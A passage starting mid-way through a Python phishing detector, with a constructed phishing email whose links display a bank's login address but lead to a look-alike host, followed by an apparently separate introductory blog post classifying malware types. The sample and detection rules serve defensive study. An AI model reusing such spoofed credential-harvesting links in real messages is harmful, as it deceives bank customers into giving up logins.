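<p><a href="http://ing-diba-sicherheit.example.net/login">https://www.ing-diba.de/login</a></p>
<p><a href="http://ing-diba-sicherheit.example.net/notcustomer">I am not a customer</a></p>
</body></html>
"""

# Constructed control: a plain notification with none of the features.
CONTROL = """\
From: Newsletter <news@example.org>
To: kunde@example.org
Subject: Your March statement
Content-Type: text/plain; charset=utf-8

Dear Ms Example,
your statement for March is available in your online banking mailbox.
Kind regards
"""

URGENCY = ("as soon as possible", "immediately", "within 24 hours",
           "account has been suspended", "avoid any delay", "has been debited")
GENERIC_SALUTATION = re.compile(r"\b(dear|hello|hi)\s+(customer|user|member|client|sir|madam)\b", re.I)
ANY_SALUTATION = re.compile(r"\b(dear|hello|hi)\b", re.I)
LOGIN_PATH = re.compile(r"/(login|signin|logon|account)", re.I)

class LinkCollector(HTMLParser):
    """Pairs each <a href> with the text the recipient actually sees."""
    def __init__(self):
        super().__init__()
        self.links, self._href, self._text = [], None, []
    def handle_starttag(self, tag, attrs):
        if tag == "a":
            self._href, self._text = dict(attrs).get("href"), []
    def handle_data(self, data):
        if self._href is not None:
            self._text.append(data)
    def handle_endtag(self, tag):
        if tag == "a" and self._href is not None:
            self.links.append((self._href, "".join(self._text).strip()))
            self._href = None

def host_of(url):
    if not re.match(r"[a-z]+://", url, re.I):
        url = "http://" + url
    return (urlparse(url).hostname or "").lower()

def assess(raw):
    """Return the phishing features found, keyed by feature name (empty dict = none)."""
    msg = message_from_string(raw)
    body = msg.get_payload(decode=True).decode(msg.get_content_charset() or "utf-8")
    text = re.sub(r"<[^>]+>", " ", body)
    findings = {}
    if GENERIC_SALUTATION.search(text) or not ANY_SALUTATION.search(text):
        findings["salutation"] = "generic or missing salutation"
    urgent = [p for p in URGENCY if p in text.lower()]
    if urgent:
        findings["urgency"] = "time pressure: " + "; ".join(urgent)
    collector = LinkCollector()
    if msg.get_content_type() == "text/html":
        collector.feed(body)
    for href, shown in collector.links:
        # Link text that looks like an address but leads somewhere else (feature 5).
        if re.match(r"(https?://|www\.)", shown, re.I) and host_of(shown) != host_of(href):
            findings["link_mismatch"] = f"text shows {host_of(shown)} but link goes to {host_of(href)}"
        if LOGIN_PATH.search(urlparse(href).path):
            findings["login_link"] = "email links directly to a login page"
    sender, recipient = parseaddr(msg["From"])[1].lower(), parseaddr(msg["To"])[1].lower()
    if sender and sender == recipient:
        findings["self_addressed"] = "sender and recipient address are identical"
    return findings

if __name__ == "__main__":
    print(assess(SAMPLE))
    print(assess(CONTROL))
```

On the constructed sample every feature fires (generic salutation, two urgency phrases, a link whose visible text names the bank while the href points elsewhere, a direct login link, identical sender and recipient), while the control message yields nothing. In practice a gateway would weight these findings rather than treat any single one as proof.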

Viruses, worms, trojans – aren’t they all the same?

Malware, cyber-attacks and how to protect yourself and your company are top of mind for employees and IT managers alike. To help understand and tackle malware and cyber-attacks, we would like to provide a series of basic information on this topic in loose succession. In this first post we give a definition and classification of malware; it is by no means complete, but covers some of the most important types.

Viruses have been around for millions of years, but have only been known to humanity for the blink of an eye, since there was no scientific evidence of viruses until the end of the 19th century. Viruses are responsible for a variety of diseases, and in nature there is an eternal struggle between the evolution of viruses and the defense against them.

It is almost the same situation in information technology. There are numerous types of malicious software, and IT security companies are constantly developing new defense methods to prevent intrusions and negative impacts on IT systems and sensitive data. When these malicious codes are referred to in general, the term “virus” is usually used.

This is perfectly understandable from the historical point of view, as originally only viruses and worms emerged as a threat. However, this terminology is insufficient because of the great variety of threats. Therefore, we would like to shed some light on the subject and give an overview of which terminologies are actually correct and which malicious codes are the most common.

Virus

The term “virus” is often used incorrectly because it is usually symbolic of the more general term “malware”. However, this is not correct since malware includes all malicious software.

The word “virus” refers only to a specific way in which a particular type of malware spreads. Such malware infects files of a defined type and inserts its malicious code into them. An infected file then carries the virus on: when it is run, it finds other files of the same type and infects them in turn.

However, viruses do not spread actively from computer to computer. This rather happens through external storage media, emails or within networks.

Worm

Just like “virus”, the term “worm” stands for a certain type of distribution. Unlike the computer virus, the malicious code spreads actively and independently by exploiting existing security gaps. A current example is a worm that spreads via open Android debugging ports, especially among Internet of Things (IoT) and other Internet-enabled devices.

In contrast to a ransomware, or software that is clearly aiming at encrypting computer data and demanding a ransom, a computer worm does not have a clearly defined goal. For example, it can compromise and make changes to the system itself, ensure a very high utilization of the Internet infrastructure or trigger DDoS attacks.

Trojans / Trojan horses

Much of the malware used today can be described as a “trojan horse”. The term is quite generic and states only that the malware disguises itself as something benign: the user sees only the useful side of the application without recognizing its harmful effect and intention, and therefore cannot influence what it does.

The name “trojan horse” goes back to the legendary strategy of Greek mythology, in which the Greek invaders tricked the inhabitants of Troy with the help of a wooden horse. For this reason, the common terminology “trojan” is incorrect, since the Trojans were the inhabitants of the city and the ones that were attacked in this historic example. The horse, in fact, was the attacker.

In addition to these most commonly used malware terminologies, there is still a large number of malware that can be broken down into the following categories.

RAT: Remote Access Trojans

This type of malware allows attackers to take over computers and remotely control them. They allow attackers to execute commands on the victims’ systems and distribute the RAT to other computers with the goal of building a botnet.

Backdoor

Backdoor malware has a similar objective to a RAT but takes a different approach. The attackers use so-called “backdoors”, hidden ways into programs or operating systems that were mostly placed there deliberately, though they may also be installed secretly.

A special characteristic of backdoors is the fact that they can be used to bypass the existing defense mechanisms. For example, they are very attractive for cybercriminals to create botnets.

Botnets and Zombies

Botnets are large accumulations of infected computers that the attacker builds up over time. Each affected computer is called a zombie. The attacker can send commands to all computers at the same time to trigger activities such as DDoS attacks or to mine bitcoins with the help of individual zombie computers.

It is especially treacherous that owners of the affected computers do not notice that they are part of a botnet until they are already carrying out the externally controlled activities.

Spyware

This is malware that collects information from the victim’s computer. Credential stealers extract the login data of user accounts such as email mailboxes, Amazon or Google accounts; keyloggers record everything the user types and often take screenshots as well; bitcoin stealers search for bitcoin wallets and rob the cryptocurrency.

Downloader / Dropper

Downloaders or droppers are small programs that serve only one purpose: to fetch more malware from the Internet. At first, victims cannot recognize what is being downloaded, because only a URL is visible. The great advantage for an attacker is being able to constantly provide new malware for download and thus distribute up-to-date, hard-to-detect malware.

Rootkit

Rootkits are the most dangerous type of malware, even though a rootkit is not necessarily malware in itself. Rather, a rootkit hides malicious code from discovery. In this form of attack, the attacker penetrates deep into the computer system, gains root privileges and thus general access rights. The system is then altered so that the user no longer notices when processes and activities are started. Attacks based on rootkit obfuscation are very hard to locate.

Naturally, there are other categories and definitions of malware that are not listed here. It should be noted that the malware which is circulating nowadays is mostly a mixture of several types. For example, there are trojan horses that also include a backdoor.

Often, the different attack types can be put together dynamically according to a modular principle. Therefore, the malware found today can no longer be clearly assigned to one of the categories mentioned above.

In our next post, you will learn about the main players in terms of malware and cyber-attacks.
